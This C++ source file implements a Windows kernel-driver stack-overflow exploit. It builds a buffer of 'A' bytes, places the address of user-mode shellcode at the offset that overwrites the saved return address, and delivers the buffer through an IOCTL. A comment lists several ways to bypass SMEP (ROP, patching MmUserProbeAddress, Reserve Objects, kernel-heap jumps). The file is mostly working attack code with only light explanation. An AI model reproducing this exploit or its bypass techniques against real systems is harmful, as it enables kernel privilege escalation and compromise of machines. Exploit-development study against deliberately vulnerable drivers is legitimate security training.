StackOverflow.cpp
#include "StackOverflow.h"

#include <cstring>
#include <vector>
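bool
ExploitStackOverflow::exploit() {
    // Size of the input buffer handed to the driver, and the byte offset inside
    // it at which the payload address is written. Both are hard-coded for one
    // particular driver build (the name says the offset reaches the saved
    // return address); they carry no meaning for any other build.
    static const size_t Buffer_Size = 2084;
    static const size_t EIP_Overwrite_Offset = 2080;
    // The DWORD-sized store at EIP_Overwrite_Offset must stay inside the buffer.
    static_assert(EIP_Overwrite_Offset + sizeof(DWORD) <= Buffer_Size,
                  "EIP_Overwrite_Offset write would run past Buffer_Size");

    /*
     * This won't work since Windows 8.0 / Intel Ivy Bridge (those after 2011: i3, i5, i7, and so on)
     * processors due to CR4.SMEP (Supervisor Mode Execution Prevention) feature preventing
     * Ring0 code executing code located within user-mode memory pages.
     * Can be bypassed in the following ways:
     * - Return Oriented Programming
     * - modifying nt!MmUserProbeAddress (equivalent of addr_limit with ULONG_MAX on Linux)
     * - using Reserve Objects of Windows 7, allocate, execute user-controlled 16 bytes to
     *   clear-out the CR4.SMEP bit and then jump to the payload in user-mode memory.
     * - jumping to Kernel Heap on x86
     */
    auto shellcodePointer = adjustPayloadEpilogue(8, true);

    // Whole buffer pre-filled with 'A'. A std::vector releases its storage with
    // the matching array deallocation; the previous shared_ptr<UCHAR> over
    // `new UCHAR[]` paired new[] with plain delete, which is undefined
    // behaviour. Allocation failure now surfaces as std::bad_alloc (the old
    // null check could never fire, since a throwing `new` never returns null).
    std::vector<UCHAR> buffer(Buffer_Size, static_cast<UCHAR>('A'));

    // Store the payload address at the overwrite offset via memcpy instead of a
    // reinterpret_cast'ed DWORD store, so the write is well-defined regardless
    // of alignment or aliasing. The pointer-to-DWORD conversion is unchanged
    // from the original (it only fits a 32-bit address space).
    const DWORD payloadAddress = reinterpret_cast<DWORD>(*shellcodePointer);
    std::memcpy(&buffer[EIP_Overwrite_Offset], &payloadAddress, sizeof(payloadAddress));

    // Hand the crafted buffer to the driver; the IOCTL result is our result.
    return driver.SendIOCTL(
        ExploitStackOverflow::Ioctl_Code,
        buffer.data(),
        Buffer_Size
    );
}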